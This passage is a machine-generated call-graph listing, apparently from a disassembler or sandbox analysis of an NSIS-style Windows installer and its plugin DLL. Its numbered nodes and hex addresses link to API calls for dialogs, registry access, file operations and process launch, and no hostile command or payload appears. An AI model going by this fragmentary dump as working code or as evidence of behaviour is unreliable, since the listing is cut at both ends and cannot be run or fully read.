4829 404bec GetMessagePos ScreenToClient SendMessageW 4827->4829 4830 404c20 4828->4830 4829->4830 4831 404c25 4829->4831 4830->4825 4831->4828 4841 406297 lstrcpynW 4832->4841 4834 404c5c 4842 4061de wsprintfW 4834->4842 4836 404c66 4837 40140b 2 API calls 4836->4837 4838 404c6f 4837->4838 4843 406297 lstrcpynW 4838->4843 4840 404c76 4840->4816 4841->4834 4842->4836 4843->4840 5259 401cf3 5260 402c1f 17 API calls 5259->5260 5261 401cf9 IsWindow 5260->5261 5262 401a20 5261->5262 5263 401573 5264 401583 ShowWindow 5263->5264 5265 40158c 5263->5265 5264->5265 5266 402ac5 5265->5266 5267 40159a ShowWindow 5265->5267 5267->5266 5268 402df3 5269 402e05 SetTimer 5268->5269 5270 402e1e 5268->5270 5269->5270 5271 402e73 5270->5271 5272 402e38 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 5270->5272 5272->5271 5273 4014f5 SetForegroundWindow 5274 402ac5 5273->5274 5275 402576 5276 402c41 17 API calls 5275->5276 5277 40257d 5276->5277 5280 405d8d GetFileAttributesW CreateFileW 5277->5280 5279 402589 5280->5279 4944 401b77 4945 401bc8 4944->4945 4950 401b84 4944->4950 4946 401bf2 GlobalAlloc 4945->4946 4947 401bcd 4945->4947 4949 4062b9 17 API calls 4946->4949 4960 4022f7 4947->4960 4965 406297 lstrcpynW 4947->4965 4948 4062b9 17 API calls 4951 4022f1 4948->4951 4953 401c0d 4949->4953 4950->4953 4954 401b9b 4950->4954 4957 4058fd MessageBoxIndirectW 4951->4957 4953->4948 4953->4960 4963 406297 lstrcpynW 4954->4963 4955 401bdf GlobalFree 4955->4960 4957->4960 4958 401baa 4964 406297 lstrcpynW 4958->4964 4961 401bb9 4966 406297 lstrcpynW 4961->4966 4963->4958 4964->4961 4965->4955 4966->4960 4967 4024f8 4968 402c81 17 API calls 4967->4968 4969 402502 4968->4969 4970 402c1f 17 API calls 4969->4970 4971 40250b 4970->4971 4972 40288b 4971->4972 4973 402533 RegEnumValueW 4971->4973 4974 402527 RegEnumKeyW 4971->4974 4975 40254f RegCloseKey 4973->4975 4976 402548 4973->4976 4974->4975 4975->4972 4976->4975 5281 401ffa 5282 402005 5281->5282 5283 402018 5282->5283 5284 402026 5282->5284 5308 4061de wsprintfW 5282->5308 5283->5284 5309 4061de wsprintfW 5283->5309 5287 4020f6 5284->5287 5288 402c41 17 API calls 5284->5288 5289 401423 24 API calls 5287->5289 5290 40204b 5288->5290 5296 402250 5289->5296 5291 402c41 17 API calls 5290->5291 5292 402054 5291->5292 5293 40206a LoadLibraryExW 5292->5293 5294 40205c GetModuleHandleW 5292->5294 5293->5287 5295 40207b 5293->5295 5294->5293 5294->5295 5297 4066e0 2 API calls 5295->5297 5298 402086 5297->5298 5299 4020c5 5298->5299 5300 40208c 5298->5300 5303 40209c 5299->5303 5304 4052ff 24 API calls 5299->5304 5301 402094 5300->5301 5302 4020ab 5300->5302 5305 401423 24 API calls 5301->5305 5307 6f97177b 50 API calls 5302->5307 5303->5296 5306 4020e8 FreeLibrary 5303->5306 5304->5303 5305->5303 5306->5296 5307->5303 5308->5283 5309->5284 4978 404c7b GetDlgItem GetDlgItem 4979 404ccd 7 API calls 4978->4979 4987 404ee6 4978->4987 4980 404d70 DeleteObject 4979->4980 4981 404d63 SendMessageW 4979->4981 4982 404d79 4980->4982 4981->4980 4984 404d88 4982->4984 4985 404db0 4982->4985 4983 404fca 4990 405076 4983->4990 4996 40525e 4983->4996 5002 405023 SendMessageW 4983->5002 4986 4062b9 17 API calls 4984->4986 4989 40420e 18 API calls 4985->4989 4991 404d92 SendMessageW SendMessageW 4986->4991 4987->4983 4988 404fab 4987->4988 4994 404f46 4987->4994 4988->4983 4998 404fbc SendMessageW 4988->4998 4995 404dc4 4989->4995 4992 405080 SendMessageW 4990->4992 4993 405088 4990->4993 4991->4982 4992->4993 4999 4050b1 4993->4999 5004 4050a1 4993->5004 5005 40509a ImageList_Destroy 4993->5005 5000 404bc9 5 API calls 4994->5000 5001 40420e 18 API calls 4995->5001 4997 404275 8 API calls 4996->4997 5003 40526c 4997->5003 4998->4983 5007 405220 4999->5007 5023 404c49 4 API calls 4999->5023 5029 4050ec 4999->5029 5025 404f57 5000->5025 5006 404dd2 5001->5006 5002->4996 5008 405038 SendMessageW 5002->5008 5004->4999 5009 4050aa GlobalFree 5004->5009 5005->5004 5010 404ea7 GetWindowLongW SetWindowLongW 5006->5010 5017 404ea1 5006->5017 5020 404e22 SendMessageW 5006->5020 5021 404e5e SendMessageW 5006->5021 5022 404e6f SendMessageW 5006->5022 5007->4996 5012 405232 ShowWindow GetDlgItem ShowWindow 5007->5012 5011 40504b 5008->5011 5009->4999 5013 404ec0 5010->5013 5016 40505c SendMessageW 5011->5016 5012->4996 5014 404ec6 ShowWindow 5013->5014 5015 404ede 5013->5015 5034 404243 SendMessageW 5014->5034 5035 404243 SendMessageW 5015->5035 5016->4990 5017->5010 5017->5013 5020->5006 5021->5006 5022->5006 5023->5029 5024 404ed9 5024->4996 5025->4988 5026 4051f6 InvalidateRect 5026->5007 5027 40520c 5026->5027 5036 404b84 5027->5036 5028 40511a SendMessageW 5030 405130 5028->5030 5029->5028 5029->5030 5030->5026 5031 405191 5030->5031 5033 4051a4 SendMessageW SendMessageW 5030->5033 5031->5033 5033->5030 5034->5024 5035->4987 5039 404abb 5036->5039 5038 404b99 5038->5007 5040 404ad4 5039->5040 5041 4062b9 17 API calls 5040->5041 5042 404b38 5041->5042 5043 4062b9 17 API calls 5042->5043 5044 404b43 5043->5044 5045 4062b9 17 API calls 5044->5045 5046 404b59 lstrlenW wsprintfW SetDlgItemTextW 5045->5046 5046->5038 5310 40167b 5311 402c41 17 API calls 5310->5311 5312 401682 5311->5312 5313 402c41 17 API calls 5312->5313 5314 40168b 5313->5314 5315 402c41 17 API calls 5314->5315 5316 401694 MoveFileW 5315->5316 5317 4016a7 5316->5317 5323 4016a0 5316->5323 5318 402250 5317->5318 5320 4065da 2 API calls 5317->5320 5319 401423 24 API calls 5319->5318 5321 4016b6 5320->5321 5321->5318 5322 40605d 36 API calls 5321->5322 5322->5323 5323->5319 5324 401e7d 5325 402c41 17 API calls 5324->5325 5326 401e83 5325->5326 5327 402c41 17 API calls 5326->5327 5328 401e8c 5327->5328 5329 402c41 17 API calls 5328->5329 5330 401e95 5329->5330 5331 402c41 17 API calls 5330->5331 5332 401e9e 5331->5332 5333 401423 24 API calls 5332->5333 5334 401ea5 5333->5334 5341 4058c3 ShellExecuteExW 5334->5341 5336 401ee7 5339 40288b 5336->5339 5342 406722 WaitForSingleObject 5336->5342 5338 401f01 CloseHandle 5338->5339 5341->5336 5343 40673c 5342->5343 5344 40674e GetExitCodeProcess 5343->5344 5345 4066ad 2 API calls 5343->5345 5344->5338 5346 406743 WaitForSingleObject 5345->5346 5346->5343 5347 40437e lstrlenW 5348 40439d 5347->5348 5349 40439f WideCharToMultiByte 5347->5349 5348->5349 5350 4046ff 5351 40472b 5350->5351 5352 40473c 5350->5352 5411 4058e1 GetDlgItemTextW 5351->5411 5354 404748 GetDlgItem 5352->5354 5361 4047a7 5352->5361 5357 40475c 5354->5357 5355 40488b 5360 404a3a 5355->5360 5413 4058e1 GetDlgItemTextW 5355->5413 5356 404736 5358 40652b 5 API calls 5356->5358 5359 404770 SetWindowTextW 5357->5359 5364 405c17 4 API calls 5357->5364 5358->5352 5365 40420e 18 API calls 5359->5365 5363 404275 8 API calls 5360->5363 5361->5355 5361->5360 5366 4062b9 17 API calls 5361->5366 5368 404a4e 5363->5368 5369 404766 5364->5369 5370 40478c 5365->5370 5371 40481b SHBrowseForFolderW 5366->5371 5367 4048bb 5372 405c74 18 API calls 5367->5372 5369->5359 5376 405b6c 3 API calls 5369->5376 5373 40420e 18 API calls 5370->5373 5371->5355 5374 404833 CoTaskMemFree 5371->5374 5375 4048c1 5372->5375 5377 40479a 5373->5377 5378 405b6c 3 API calls 5374->5378 5414 406297 lstrcpynW 5375->5414 5376->5359 5412 404243 SendMessageW 5377->5412 5380 404840 5378->5380 5383 404877 SetDlgItemTextW 5380->5383 5387 4062b9 17 API calls 5380->5387 5382 4047a0 5385 406671 5 API calls 5382->5385 5383->5355 5384 4048d8 5386 406671 5 API calls 5384->5386 5385->5361 5393 4048df 5386->5393 5389 40485f lstrcmpiW 5387->5389 5388 404920 5415 406297 lstrcpynW 5388->5415 5389->5383 5390 404870 lstrcatW 5389->5390 5390->5383 5392 404927 5394 405c17 4 API calls 5392->5394 5393->5388 5398 405bb8 2 API calls 5393->5398 5399 404978 5393->5399 5395 40492d GetDiskFreeSpaceW 5394->5395 5397 404951 MulDiv 5395->5397 5395->5399 5397->5399 5398->5393 5400 4049e9 5399->5400 5402 404b84 20 API calls 5399->5402 5401 404a0c 5400->5401 5403 40140b 2 API calls 5400->5403 5416 404230 EnableWindow 5401->5416 5404 4049d6 5402->5404 5403->5401 5406 4049eb SetDlgItemTextW 5404->5406 5407 4049db 5404->5407 5406->5400 5409 404abb 20 API calls 5407->5409 5408 404a28 5408->5360 5410 404658 SendMessageW 5408->5410 5409->5400 5410->5360 5411->5356 5412->5382 5413->5367 5414->5384 5415->5392 5416->5408 5417 4019ff 5418 402c41 17 API calls 5417->5418 5419 401a06 5418->5419 5420 402c41 17 API calls 5419->5420 5421 401a0f 5420->5421 5422 401a16 lstrcmpiW 5421->5422 5423 401a28 lstrcmpW 5421->5423 5424 401a1c 5422->5424 5423->5424 5425 401000 5426 401037 BeginPaint GetClientRect 5425->5426 5427 40100c DefWindowProcW 5425->5427 5428 4010f3 5426->5428 5432 401179 5427->5432 5430 401073 CreateBrushIndirect FillRect DeleteObject 5428->5430 5431 4010fc 5428->5431 5430->5428 5433 401102 CreateFontIndirectW 5431->5433 5434 401167 EndPaint 5431->5434 5433->5434 5435 401112 6 API calls 5433->5435 5434->5432 5435->5434 5436 401503 5437 40150b 5436->5437 5439 40151e 5436->5439 5438 402c1f 17 API calls 5437->5438 5438->5439 4295 402484 4306 402c81 4295->4306 4298 402c41 17 API calls 4299 402497 4298->4299 4300 4024a2 RegQueryValueExW 4299->4300 4304 40288b 4299->4304 4301 4024c8 RegCloseKey 4300->4301 4302 4024c2 4300->4302 4301->4304 4302->4301 4311 4061de wsprintfW 4302->4311 4307 402c41 17 API calls 4306->4307 4308 402c98 4307->4308 4309 406104 RegOpenKeyExW 4308->4309 4310 40248e 4309->4310 4310->4298 4311->4301 5440 402104 5441 402c41 17 API calls 5440->5441 5442 40210b 5441->5442 5443 402c41 17 API calls 5442->5443 5444 402115 5443->5444 5445 402c41 17 API calls 5444->5445 5446 40211f 5445->5446 5447 402c41 17 API calls 5446->5447 5448 402129 5447->5448 5449 402c41 17 API calls 5448->5449 5451 402133 5449->5451 5450 402172 CoCreateInstance 5455 402191 5450->5455 5451->5450 5452 402c41 17 API calls 5451->5452 5452->5450 5453 401423 24 API calls 5454 402250 5453->5454 5455->5453 5455->5454 5456 401f06 5457 402c41 17 API calls 5456->5457 5458 401f0c 5457->5458 5459 4052ff 24 API calls 5458->5459 5460 401f16 5459->5460 5461 405880 2 API calls 5460->5461 5462 401f1c 5461->5462 5464 406722 5 API calls 5462->5464 5466 40288b 5462->5466 5468 401f3f CloseHandle 5462->5468 5465 401f31 5464->5465 5465->5468 5469 4061de wsprintfW 5465->5469 5468->5466 5469->5468 5470 6f9718dd 5472 6f971900 5470->5472 5471 6f971947 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 5474 6f971272 2 API calls 5471->5474 5472->5471 5473 6f971935 GlobalFree 5472->5473 5473->5471 5475 6f971ad2 GlobalFree GlobalFree 5474->5475 5476 40190c 5477 401943 5476->5477 5478 402c41 17 API calls 5477->5478 5479 401948 5478->5479 5480 4059a9 67 API calls 5479->5480 5481 401951 5480->5481 5482 40230c 5483 402314 5482->5483 5484 40231a 5482->5484 5485 402c41 17 API calls 5483->5485 5486 402328 5484->5486 5487 402c41 17 API calls 5484->5487 5485->5484 5488 402336 5486->5488 5489 402c41 17 API calls 5486->5489 5487->5486 5490 402c41 17 API calls 5488->5490 5489->5488 5491 40233f WritePrivateProfileStringW 5490->5491 5492 40238e 5493 4023c1 5492->5493 5494 402396 5492->5494 5496 402c41 17 API calls 5493->5496 5495 402c81 17 API calls 5494->5495 5497 40239d 5495->5497 5498 4023c8 5496->5498 5500 402c41 17 API calls 5497->5500 5501 4023d5 5497->5501 5503 402cff 5498->5503 5502 4023ae RegDeleteValueW RegCloseKey 5500->5502 5502->5501 5504 402d13 5503->5504 5505 402d0c 5503->5505 5504->5505 5507 402d44 5504->5507 5505->5501 5508 406104 RegOpenKeyExW 5507->5508 5512 402d72 5508->5512 5509 402d98 RegEnumKeyW 5510 402daf RegCloseKey 5509->5510 5509->5512 5513 406671 5 API calls 5510->5513 5511 402dd0 RegCloseKey 5517 402dc3 5511->5517 5512->5509 5512->5510 5512->5511 5514 402d44 6 API calls 5512->5514 5512->5517 5515 402dbf 5513->5515 5514->5512 5516 402de0 RegDeleteKeyW 5515->5516 5515->5517 5516->5517 5517->5505 5518 40190f 5519 402c41 17 API calls 5518->5519 5520 401916 5519->5520 5521 4058fd MessageBoxIndirectW 5520->5521 5522 40191f 5521->5522 5523 6f9716d8 5524 6f971707 5523->5524 5525 6f971b63 22 API calls 5524->5525 5526 6f97170e 5525->5526 5527 6f971715 5526->5527 5528 6f971721 5526->5528 5529 6f971272 2 API calls 5527->5529 5530 6f97172b 5528->5530 5531 6f971748 5528->5531 5532 6f97171f 5529->5532 5533 6f97153d 3 API calls 5530->5533 5534 6f971772 5531->5534 5535 6f97174e 5531->5535 5537 6f971730 5533->5537 5536 6f97153d 3 API calls 5534->5536 5538 6f9715b4 3 API calls 5535->5538 5536->5532 5540 6f9715b4 3 API calls 5537->5540 5539 6f971753 5538->5539 5541 6f971272 2 API calls 5539->5541 5542 6f971736 5540->5542 5543 6f971759 GlobalFree 5541->5543 5544 6f971272 2 API calls 5542->5544 5543->5532 5545 6f97176d GlobalFree 5543->5545 5546 6f97173c GlobalFree 5544->5546 5545->5532 5546->5532 5547 6f971058 5549 6f971074 5547->5549 5548 6f9710dd 5549->5548 5550 6f971516 GlobalFree 5549->5550 5551 6f971092 5549->5551 5550->5551 5552 6f971516 GlobalFree 5551->5552 5553 6f9710a2 5552->5553 5554 6f9710b2 5553->5554 5555 6f9710a9 GlobalSize 5553->5555 5556 6f9710b6 GlobalAlloc 5554->5556 5557 6f9710c7 5554->5557 5555->5554 5558 6f97153d 3 API calls 5556->5558 5559 6f9710d2 GlobalFree 5557->5559 5558->5557 5559->5548 5560 401491 5561 4052ff 24 API calls 5560->5561 5562 401498 5561->5562 5563 401d14 5564 402c1f 17 API calls 5563->5564 5565 401d1b 5564->5565 5566 402c1f 17 API calls 5565->5566 5567 401d27 GetDlgItem 5566->5567 5568 402592 5567->5568 5569 402598 5570 4025c7 5569->5570 5571 4025ac 5569->5571 5573 4025fb 5570->5573 5574 4025cc 5570->5574 5572 402c1f 17 API calls 5571->5572 5579 4025b3 5572->5579 5576 402c41 17 API calls 5573->5576 5575 402c41 17 API calls 5574->5575 5577 4025d3 WideCharToMultiByte lstrlenA 5575->5577 5578 402602 lstrlenW 5576->5578 5577->5579 5578->5579 5580 40262f 5579->5580 5582 402645 5579->5582 5583 405e6e 5 API calls 5579->5583 5581 405e3f WriteFile 5580->5581 5580->5582 5581->5582 5583->5580 5584 6f972c4f 5585 6f972c67 5584->5585 5586 6f97158f 2 API calls 5585->5586 5587 6f972c82 5586->5587 5588 40149e 5589 4022f7 5588->5589 5590 4014ac PostQuitMessage 5588->5590 5590->5589 5591 401c1f 5592 402c1f 17 API calls 5591->5592 5593 401c26 5592->5593 5594 402c1f 17 API calls 5593->5594 5595 401c33 5594->5595 5596 401c48 5595->5596 5598 402c41 17 API calls 5595->5598 5597 401c58 5596->5597 5599 402c41 17 API calls 5596->5599 5600 401c63 5597->5600 5601 401caf 5597->5601 5598->5596 5599->5597 5602 402c1f 17 API calls 5600->5602 5603 402c41 17 API calls 5601->5603 5604 401c68 5602->5604 5605 401cb4 5603->5605 5607 402c1f 17 API calls 5604->5607 5606 402c41 17 API calls 5605->5606 5608 401cbd FindWindowExW 5606->5608 5609 401c74 5607->5609 5612 401cdf 5608->5612 5610 401c81 SendMessageTimeoutW 5609->5610 5611 401c9f SendMessageW 5609->5611 5610->5612 5611->5612 5613 402aa0 SendMessageW 5614 402ac5 5613->5614 5615 402aba InvalidateRect 5613->5615 5615->5614 5616 402821 5617 402827 5616->5617 5618 40282f FindClose 5617->5618 5619 402ac5 5617->5619 5618->5619 4239 4015a3 4240 402c41 17 API calls 4239->4240 4241 4015aa SetFileAttributesW 4240->4241 4242 4015bc 4241->4242 5620 6f971671 5621 6f971516 GlobalFree 5620->5621 5623 6f971689 5621->5623 5622 6f9716cf GlobalFree 5623->5622 5624 6f9716a4 5623->5624 5625 6f9716bb VirtualFree 5623->5625 5624->5622 5625->5622 5626 4029a8 5627 402c1f 17 API calls 5626->5627 5628 4029ae 5627->5628 5629 4029d5 5628->5629 5630 4029ee 5628->5630 5636 40288b 5628->5636 5631 4029da 5629->5631 5632 4029eb 5629->5632 5633 402a08 5630->5633 5634 4029f8 5630->5634 5640 406297 lstrcpynW 5631->5640 5632->5636 5641 4061de wsprintfW 5632->5641 5635 4062b9 17 API calls 5633->5635 5637 402c1f 17 API calls 5634->5637 5635->5632 5637->5632 5640->5636 5641->5636 5642 4028ad 5643 402c41 17 API calls 5642->5643 5645 4028bb 5643->5645 5644 4028d1 5647 405d68 2 API calls 5644->5647 5645->5644 5646 402c41 17 API calls 5645->5646 5646->5644 5648 4028d7 5647->5648 5670 405d8d GetFileAttributesW CreateFileW 5648->5670 5650 4028e4 5651 4028f0 GlobalAlloc 5650->5651 5652 402987 5650->5652 5655 402909 5651->5655 5656 40297e CloseHandle 5651->5656 5653 4029a2 5652->5653 5654 40298f DeleteFileW 5652->5654 5654->5653 5671 403324 SetFilePointer 5655->5671 5656->5652 5658 40290f 5659 40330e ReadFile 5658->5659 5660 402918 GlobalAlloc 5659->5660 5661 402928 5660->5661 5662 40295c 5660->5662 5663 403116 31 API calls 5661->5663 5664 405e3f WriteFile 5662->5664 5669 402935 5663->5669 5665 402968 GlobalFree 5664->5665 5666 403116 31 API calls 5665->5666 5668 40297b 5666->5668 5667 402953 GlobalFree 5667->5662 5668->5656 5669->5667 5670->5650 5671->5658 5672 401a30 5673 402c41 17 API calls 5672->5673 5674 401a39 ExpandEnvironmentStringsW 5673->5674 5675 401a4d 5674->5675 5677 401a60 5674->5677 5676 401a52 lstrcmpW 5675->5676 5675->5677 5676->5677 4625 402032 4626 402044 4625->4626 4636 4020f6 4625->4636 4627 402c41 17 API calls 4626->4627 4629 40204b 4627->4629 4628 401423 24 API calls 4632 402250 4628->4632 4630 402c41 17 API calls 4629->4630 4631 402054 4630->4631 4633 40206a LoadLibraryExW 4631->4633 4634 40205c GetModuleHandleW 4631->4634 4635 40207b 4633->4635 4633->4636 4634->4633 4634->4635 4648 4066e0 WideCharToMultiByte 4635->4648 4636->4628 4639 4020c5 4643 40209c 4639->4643 4644 4052ff 24 API calls 4639->4644 4640 40208c 4641 402094 4640->4641 4642 4020ab 4640->4642 4645 401423 24 API calls 4641->4645 4651 6f97177b 4642->4651 4643->4632 4646 4020e8 FreeLibrary 4643->4646 4644->4643 4645->4643 4646->4632 4649 40670a GetProcAddress 4648->4649 4650 402086 4648->4650 4649->4650 4650->4639 4650->4640 4652 6f9717ae 4651->4652 4693 6f971b63 4652->4693 4654 6f9717b5 4655 6f9718da 4654->4655 4656 6f9717c6 4654->4656 4657 6f9717cd 4654->4657 4655->4643 4743 6f972356 4656->4743 4727 6f972398 4657->4727 4662 6f971813 4756 6f97256d 4662->4756 4663 6f971831 4668 6f971837 4663->4668 4669 6f971882 4663->4669 4664 6f9717e3 4667 6f9717e9 4664->4667 4673 6f9717f4 4664->4673 4665 6f9717fc 4679 6f9717f2 4665->4679 4753 6f972d2f 4665->4753 4667->4679 4737 6f972a74 4667->4737 4775 6f9715c6 4668->4775 4671 6f97256d 10 API calls 4669->4671 4677 6f971873 4671->4677 4672 6f971819 4767 6f9715b4 4672->4767 4747 6f972728 4673->4747 4684 6f9718c9 4677->4684 4782 6f972530 4677->4782 4679->4662 4679->4663 4681 6f97256d 10 API calls 4681->4677 4683 6f9717fa 4683->4679 4684->4655 4686 6f9718d3 GlobalFree 4684->4686 4686->4655 4690 6f9718b5 4690->4684 4786 6f97153d wsprintfW 4690->4786 4691 6f9718ae FreeLibrary 4691->4690 4789 6f97121b GlobalAlloc 4693->4789 4695 6f971b87 4790 6f97121b GlobalAlloc 4695->4790 4697 6f971dad GlobalFree GlobalFree GlobalFree 4698 6f971dca 4697->4698 4718 6f971e14 4697->4718 4700 6f972196 4698->4700 4707 6f971ddf 4698->4707 4698->4718 4699 6f971c68 GlobalAlloc 4717 6f971b92 4699->4717 4701 6f9721b8 GetModuleHandleW 4700->4701 4700->4718 4704 6f9721de 4701->4704 4705 6f9721c9 LoadLibraryW 4701->4705 4702 6f971cb3 lstrcpyW 4706 6f971cbd lstrcpyW 4702->4706 4703 6f971cd1 GlobalFree 4703->4717 4797 6f971621 WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4704->4797 4705->4704 4705->4718 4706->4717 4707->4718 4793 6f97122c 4707->4793 4709 6f972230 4712 6f97223d lstrlenW 4709->4712 4709->4718 4711 6f972068 4796 6f97121b GlobalAlloc 4711->4796 4798 6f971621 WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4712->4798 4713 6f9721f0 4713->4709 4725 6f97221a GetProcAddress 4713->4725 4714 6f9720f0 4714->4718 4721 6f972138 lstrcpyW 4714->4721 4717->4697 4717->4699 4717->4702 4717->4703 4717->4706 4717->4711 4717->4714 4717->4718 4719 6f971d0f 4717->4719 4720 6f971fa9 GlobalFree 4717->4720 4724 6f97122c 2 API calls 4717->4724 4718->4654 4719->4717 4791 6f97158f GlobalSize GlobalAlloc 4719->4791 4720->4717 4721->4718 4722 6f972257 4722->4718 4724->4717 4725->4709 4726 6f972071 4726->4654 4729 6f9723b0 4727->4729 4728 6f97122c GlobalAlloc lstrcpynW 4728->4729 4729->4728 4731 6f9724d9 GlobalFree 4729->4731 4733 6f972483 GlobalAlloc CLSIDFromString 4729->4733 4734 6f972458 GlobalAlloc WideCharToMultiByte 4729->4734 4736 6f9724a2 4729->4736 4800 6f9712ba 4729->4800 4731->4729 4732 6f9717d3 4731->4732 4732->4664 4732->4665 4732->4679 4733->4731 4734->4731 4736->4731 4804 6f9726bc 4736->4804 4739 6f972a86 4737->4739 4738 6f972b2b ReadFile 4740 6f972b49 4738->4740 4739->4738 4741 6f972c45 4740->4741 4742 6f972c3a GetLastError 4740->4742 4741->4679 4742->4741 4744 6f97236b 4743->4744 4745 6f9717cc 4744->4745 4746 6f972376 GlobalAlloc 4744->4746 4745->4657 4746->4744 4751 6f972758 4747->4751 4748 6f972806 4750 6f97280c GlobalSize 4748->4750 4752 6f972816 4748->4752 4749 6f9727f3 GlobalAlloc 4749->4752 4750->4752 4751->4748 4751->4749 4752->4683 4754 6f972d3a 4753->4754 4755 6f972d7a GlobalFree 4754->4755 4807 6f97121b GlobalAlloc 4756->4807 4758 6f972623 lstrcpynW 4765 6f972577 4758->4765 4759 6f972612 StringFromGUID2 4759->4765 4760 6f9725f0 MultiByteToWideChar 4760->4765 4761 6f972636 wsprintfW 4761->4765 4762 6f97265a GlobalFree 4762->4765 4763 6f97268f GlobalFree 4763->4672 4764 6f971272 2 API calls 4764->4765 4765->4758 4765->4759 4765->4760 4765->4761 4765->4762 4765->4763 4765->4764 4808 6f9712e1 4765->4808 4812 6f97121b GlobalAlloc 4767->4812 4769 6f9715b9 4770 6f9715c6 2 API calls 4769->4770 4771 6f9715c3 4770->4771 4772 6f971272 4771->4772 4773 6f9712b5 GlobalFree 4772->4773 4774 6f97127b GlobalAlloc lstrcpynW 4772->4774 4773->4677 4774->4773 4776 6f9715d6 lstrcpyW 4775->4776 4777 6f9715e4 4775->4777 4780 6f97161d 4776->4780 4777->4776 4778 6f9715f0 4777->4778 4778->4780 4781 6f97160d wsprintfW 4778->4781 4780->4681 4781->4780 4783 6f97253e 4782->4783 4784 6f971895 4782->4784 4783->4784 4785 6f97255a GlobalFree 4783->4785 4784->4690 4784->4691 4785->4783 4787 6f971272 2 API calls 4786->4787 4788 6f97155e 4787->4788 4788->4684 4789->4695 4790->4717 4792 6f9715ad 4791->4792 4792->4719 4799 6f97121b GlobalAlloc 4793->4799 4795 6f97123b lstrcpynW 4795->4718 4796->4726 4797->4713 4798->4722 4799->4795 4801 6f9712c1 4800->4801 4802 6f97122c 2 API calls 4801->4802 4803 6f9712df 4802->4803 4803->4729 4805 6f972720 4804->4805 4806 6f9726ca VirtualAlloc 4804->4806 4805->4736 4806->4805 4807->4765 4809 6f97130c 4808->4809 4810 6f9712ea 4808->4810 4809->4765 4810->4809 4811 6f9712f0 lstrcpyW 4810->4811 4811->4809 4812->4769 4844 403d35 4845 403e88 4844->4845 4846 403d4d 4844->4846 4848 403e99 GetDlgItem GetDlgItem 4845->4848 4857 403ed9 4845->4857 4846->4845 4847 403d59 4846->4847 4849 403d64 SetWindowPos 4847->4849 4850 403d77 4847->4850 4851 40420e 18 API calls 4848->4851 4849->4850 4854 403d94 4850->4854 4855 403d7c ShowWindow 4850->4855 4856 403ec3 SetClassLongW 4851->4856 4852 403f33 4853 40425a SendMessageW 4852->4853 4863 403e83 4852->4863 4905 403f45 4853->4905 4858 403db6 4854->4858 4859 403d9c DestroyWindow 4854->4859 4855->4854 4860 40140b 2 API calls 4856->4860 4857->4852 4861 401389 2 API calls 4857->4861 4864 403dbb SetWindowLongW 4858->4864 4865 403dcc 4858->4865 4862 4041b8 4859->4862 4860->4857 4866 403f0b 4861->4866 4862->4863 4873 4041c8 ShowWindow 4862->4873 4864->4863 4869 403e75 4865->4869 4870 403dd8 GetDlgItem 4865->4870 4866->4852 4871 403f0f SendMessageW 4866->4871 4867 40140b 2 API calls 4867->4905 4868 404199 DestroyWindow EndDialog 4868->4862 4925 404275 4869->4925 4874 403e08 4870->4874 4875 403deb SendMessageW IsWindowEnabled 4870->4875 4871->4863 4873->4863 4877 403e15 4874->4877 4878 403e5c SendMessageW 4874->4878 4879 403e28 4874->4879 4887 403e0d 4874->4887 4875->4863 4875->4874 4876 4062b9 17 API calls 4876->4905 4877->4878 4877->4887 4878->4869 4881 403e30 4879->4881 4882 403e45 4879->4882 4884 40140b 2 API calls 4881->4884 4885 40140b 2 API calls 4882->4885 4883 403e43 4883->4869 4884->4887 4888 403e4c 4885->4888 4886 40420e 18 API calls 4886->4905 4922 4041e7 4887->4922 4888->4869 4888->4887 4890 403fc0 GetDlgItem 4891 403fd5 4890->4891 4892 403fdd ShowWindow KiUserCallbackDispatcher 4890->4892 4891->4892 4919 404230 EnableWindow 4892->4919 4894 404007 EnableWindow 4899 40401b 4894->4899 4895 404020 GetSystemMenu EnableMenuItem SendMessageW 4896 404050 SendMessageW 4895->4896 4895->4899 4896->4899 4898 403d16 18 API calls 4898->4899 4899->4895 4899->4898 4920 404243 SendMessageW 4899->4920 4921 406297 lstrcpynW 4899->4921 4901 40407f lstrlenW 4902 4062b9 17 API calls 4901->4902 4903 404095 SetWindowTextW 4902->4903 4904 401389 2 API calls 4903->4904 4904->4905 4905->4863 4905->4867 4905->4868 4905->4876 4905->4886 4906 4040d9 DestroyWindow 4905->4906 4916 40420e 4905->4916 4906->4862 4907 4040f3 CreateDialogParamW 4906->4907 4907->4862 4908 404126 4907->4908 4909 40420e 18 API calls 4908->4909 4910 404131 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4909->4910 4911 401389 2 API calls 4910->4911 4912 404177 4911->4912 4912->4863 4913 40417f ShowWindow 4912->4913 4914 40425a SendMessageW 4913->4914 4915 404197 4914->4915 4915->4862 4917 4062b9 17 API calls 4916->4917 4918 404219 SetDlgItemTextW 4917->4918 4918->4890 4919->4894 4920->4899 4921->4901 4923 4041f4 SendMessageW 4922->4923 4924 4041ee 4922->4924 4923->4883 4924->4923 4926 404338 4925->4926 4927 40428d GetWindowLongW 4925->4927 4926->4863 4927->4926 4928 4042a2 4927->4928 4928->4926 4929 4042d2 4928->4929 4930 4042cf GetSysColor 4928->4930 4931 4042e2 SetBkMode 4929->4931 4932 4042d8 SetTextColor 4929->4932 4930->4929 4933 404300 4931->4933 4934 4042fa GetSysColor 4931->4934 4932->4931 4935 404311 4933->4935 4936 404307 SetBkColor 4933->4936 4934->4933 4935->4926 4937 404324 DeleteObject 4935->4937 4938 40432b CreateBrushIndirect 4935->4938 4936->4935 4937->4938 4938->4926 5683 402a35 5684 402c1f 17 API calls 5683->5684 5685 402a3b 5684->5685 5686 402a72 5685->5686 5687 40288b 5685->5687 5689 402a4d 5685->5689 5686->5687 5688 4062b9 17 API calls 5686->5688 5688->5687 5689->5687 5691 4061de wsprintfW 5689->5691 5691->5687 5692 401735 5693 402c41 17 API calls 5692->5693 5694 40173c SearchPathW 5693->5694 5695 4029e6 5694->5695 5696 401757 5694->5696 5696->5695 5698 406297 lstrcpynW 5696->5698 5698->5695 5699 6f9710e1 5702 6f971111 5699->5702 5700 6f9711d8 GlobalFree 5701 6f9712ba 2 API calls 5701->5702 5702->5700 5702->5701 5703 6f9711d3 5702->5703 5704 6f9711f8 GlobalFree 5702->5704 5705 6f971272 2 API calls 5702->5705 5706 6f971164 GlobalAlloc 5702->5706 5707 6f9712e1 lstrcpyW 5702->5707 5708 6f9711c4 